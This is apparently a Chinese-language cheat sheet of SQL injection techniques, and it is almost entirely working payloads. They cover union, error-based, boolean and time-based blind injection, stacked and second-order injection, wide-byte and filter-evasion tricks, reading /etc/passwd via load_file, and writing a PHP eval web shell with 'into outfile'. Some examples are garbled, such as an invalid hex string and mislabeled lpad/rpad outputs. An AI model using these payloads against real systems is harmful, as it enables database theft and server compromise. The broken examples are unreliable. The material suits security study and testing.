SQL注入基础总结
目录
概述
SQL注入指用户输入的参数可控, 攻击者输入的恶意代码传到后端同SQL语句一起被构造并在数据库中执行
注入姿势
普通查询注入
数字型
例如后端SQL语句长这样- select * from article where artid = 1 and xxxxx;
- ?artid=1'
- select * from article where artid = 1' and xxxx;
- ?artid=1 and 1=1
- ?artid=2 and 1=2
- select * from article where artid = 1 and 1=1 and xxxx;
order by 判断字段数- ?artid=1 order by 4
- 没报错则说明存在4个字段
- ?artid=-1 union select 1, database(), 3, 4
- ?artid=-1 union select 1,group_concat(table_name), 3, 4 from information_schema.tables where table_schema=xxx
与数字型类似,只是要注意单引号/双引号的闭合
可以在最后加上注释符把后面的语句直接注释掉
报错注入
很多Web程序没有正常的错误回显,这样就需要我们利用报错注入的方式来进行SQL注入了。
原理:当⼀个聚合函数,⽐如count()函数后⾯如果使⽤分组语句就会把查询的⼀部分以错误的形式显⽰出来。
报错常用的函数- 1.floor()
- select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
- 2.extractvalue()
- select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
- 3.updatexml()
- select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
- 4.geometrycollection()
- select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
- 5.multipoint()
- select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
- 6.polygon()
- select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
- 7.multipolygon()
- select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
- 8.linestring()
- select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
- 9.multilinestring()
- select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
- 10.exp()
- select * from test where id=1 and exp(~(select * from(select user())a));
场景:在服务器没有内容回显的时候完成的注入攻击。
Boolean盲注
盲注用到的函数- length() 返回字符串的长度
- substr() 截取字符串 (语法:SUBSTR(str,pos,len);)
- 逗号被过滤时,可以使用from...for...
- ascii() 返回字符的ascii码 [将字符变为数字wei]
- sleep() 将程序挂起一段时间n为n秒
- if(expr1,expr2,expr3) 判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
1.试探数据库名字的长度- ?id=1 and length(database()) > 7
- ?id=1 and substr(database(), 1, 1) = 's'
时间盲注
注入方法
1.判断注入点,页面的返回没有变化,可能是盲注;- "and -1=-1-- 页面返回有数据
- "and -1=-2-- 页面返回有数据
- "and sleep(5)-- w
- 若页面延时了,则证明存在时间盲注
- "and if((length(database()))=12,sleep(5),1)-- w
- 页面延时了证明当前数据库名称长度为 12。
- "and if(ascii(substr(database(),1,1))=107,sleep(5),1)-- w 页面延时了
更新类的操作的返回结果都是布尔型,无法返回数据;因此,更新类注入操作的核心就是构造报错注入的Payload- insert into user(username,password,role) values('admin' or updatexml(1, concat(0x7e, database(), 0x7e), 1) or '', 'passwd', 'editor')
- update user set password = 'kali123' where id = 5 or extractvalue(1, concat(0x7e, version(), 0x7e));
场景:可以同时执行多条sql语句
堆叠注入,顾名思义,就是将语句堆叠在一起进行查询
原理很简单,php中的mysql_multi_query(),pymysql中的cursor.execute()支持多条sql语句同时执行- select * from users;show databases;
堆叠注入的利用- SET @_sql = select database();
- PREPARE stmt from @_sql;
- EXECUTE stmp;
场景:知道数据库中的列名
原理:用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。
例如原语句:
$ sql = "UPDATE users SET PASSWORD='$ pass' where username='$ username' and password='$ curr_pass' ";
我们的用户名被admin'#传入进去,在数据库里#号为注释符 然后这句话就变成了
$ sql = "UPDATE users SET PASSWORD=’$ pass’ where username=’admin ‘ #’ and password=’$ curr_pass’ ";
然后就是=8
$ sql = "UPDATE users SET PASSWORD=’$ pass’ where username=’admin‘
宽字节注入
场景:使用了GBK编码
magic_quotes_gpc的作用:当PHP的传参中有特殊字符就会在前面加转义字符'',来做一定的过滤
为了绕过magic_quotes_gpc的,于是乎我们开始导入宽字节的概念
我们发现\的编码是%5c,然后我们会想到传参一个字符想办法凑成一个gbk字符,例如:‘運’字是%df%5c- SELECT * FROM users WHERE id='1\'' LIMIT 0,1
- SELECT * FROM users WHERE id='1%df%5c'and 1=1--+' LIMIT 0,1
- SELECT * FROM `article` where articleid = '1%df%5c'and 1=1 --+' LIMIT 0,1
- payload:%df'and 1=1 --+'
场景:使用了urldecode()解码
urldecode()与PHP本身处理编码时,两者配合失误,可构造数据绕过- %的url编码为:%25
- '的url编码为:%27
- %25%27,URL解码后是%27 也就是'
https://images.73rok.cc/img/v2-974167660f513ee90d319949958eba51_720w.jpg
MySQL的读写
文件读写与木马植入
利用前提
1.数据库配置- show global variables like '%secure%'
- # secure_file_priv = 任意读写
- # secure_file_priv = path 只能在该路径下读写
- # secure_file_priv = null 不能读写
3.知道网站绝对路径
读取文件
- # load_file('path')
- ?id=-2 union select 1, 2, 3, load_file('/etc/passwd'), 5
- # select ... into outfile ...
- select "<?php @eval($_GET['a']); ?>" into outfile "/opt/lammp/htdocs/security/shell.php"
结尾注释符过滤
- '#' 、'--+' 、'-- -' 、'%23' 、'%00'
- # 可以使用"&&"和"||"代替
- # 异或盲注绕过
- select (substr((database()),1,1)='s') ^ 0; // 异或运算相同为0,不同为1;根据返回值0,1判断
- # 大小写
- SEleCt * FRom users;
- # 双写
- SELESELECTCT * FRFROMOM users;
- #预处理
- # 字符串拼接
- SET @a=concat("sel", "ect * from users");PREPARE stmt FROM @a;EXECUTE stmt;
- # 十六进制编码
- SET @a=0x734201231231491424j19412041240115151;PREPARE stmt FROM @a;EXECUTE stmt;
- # 注释符/**/代替空格:
- select/**/database();
- # 使用加号+代替空格:(只适用于GET方法中)
- select+database();
- # 注意: 加号+在URL中使⽤记得编码为%2B: select%2Bdatabase();
- # 使⽤括号嵌套:
- select(group_concat(table_name))from(information_schema.taboles)where(tabel_schema=database());
- # 使⽤其他不可⻅字符代替空格:
- %09, %0a, %0b, %0c, %0d, %a0
- #利用``分隔进行绕过
- select host,user from user where user='a'union(select`table_name`,`table_type`from`information_schema`.`tables`);
- # in()绕过
- ascii(substr(select database(),1,1)) in(115); //根据回显判断
- # like注入
- # like子句中,'%'表示匹配0个或多个字符,'_'允许匹配任何单个字符,匹配成功返回1,失败返回0
- (select database()) like 's%';
- # regexp注入
- # 正则表达式注入,根据回显判断
- select database() regexp '^s'; //回显正常
- select database() regexp 'se';
宽字节注入
需要开启magic_quotes_gpc且数据库使用了gbk编码- SELECT * FROM users WHERE id='1\''; // 添加了\转义引号
- SELECT * FROM users WHERE id='1%df''; // '\'的url编码是%5c,传入%df',就会变成%5C%df,会被转换成中文‘運’,造成引号逃逸
例如sql语句- SELECT username,password FROM users WHERE username = 'username' and password = 'password'
- SELECT username,password FROM users WHERE username = 'admin\' and password = 'or 1 #'
逗号过滤
逗号被过滤时,substr(),limit都无法使用
可以使用from...for...过滤- select substr(select database() from 1 for 1);
- select substr(select database() from 2 for 1);
- select * from users limit 1 offset 2;
information_schema绕过与无列名注入
过滤了or即information_schema无法使用时,可以通过以下库替代
- sys.schema_auto_increment_columns(只显示有自增的表)
- sys.schema_table_statistics_with_buffer
通过这种方法可以查询表名但是没办法查列名,于是可以使用无列名注入- # 将1、2、3作为列名查询数据
- select 1,2,3 union select * from users;
- # 查询对应的某列
- select `3` from (select 1,2,3 union select * from users)a;
- # 最后的a可以是任意字符,作为别名
- # ``被过滤时可以借助别名
- select b from (select 1,2,3 as b union select * from USERS)a;
- select * from users where username = 0; # 查询表中所有数据
绕过引号构造0的方法- select * from users where username = ''+'';
- select * from users where username = ''-'';
- select * from users where username = ''*'';
- select * from users where username = ''%1#';
- select * from users where username = ''/6#';
if()=> case...when..then...else...end- 0' or if((ascii(substr((select database()),1,1))>97),1,0)#
- =
- 0' or case when ascii(substr((select database()),1,1))>97 then 1 else 0 end#
sleep() => benchmark()
benchmark()函数用来测试执行速度,第一个参数代表执行的次数,第二个参数代表要执行的表达式或函数- SELECT IF(substr((select database()),1,1)='s',sleep(3),1);
- =
- SELECT IF(substr((select database()),1,1)='s',benchmark(9999999,md5('a')),1);
concat_ws() => group_concat()- select group_concat(database());
- =
- select concat_ws(1,database());
substr() => substring() / lpad() / rpad() / left() / mid()
lpad/rpad绕过- # lpad(str1, length, str2)
- select lpad(database(),1,1) #s
- select lpad(database(),2,1) #e
- select lpad(database(),3,1) #c
- select lpad(database(),4,1) #u
- # rpad(str1, length, str2)
- select lpad(database(),1,1) #s
- select lpad(database(),2,1) #e
- select lpad(database(),3,1) #c
- select left((select database()),1) // s
- select left((select database()),2) // se
- select left((select database()),3) // sec
- select mid((select database()),1,1) // s
- select mid((select database()),2,1) // e
- select mid((select database()),3,1) // c
- select mid((select database()),4,1) // u
|
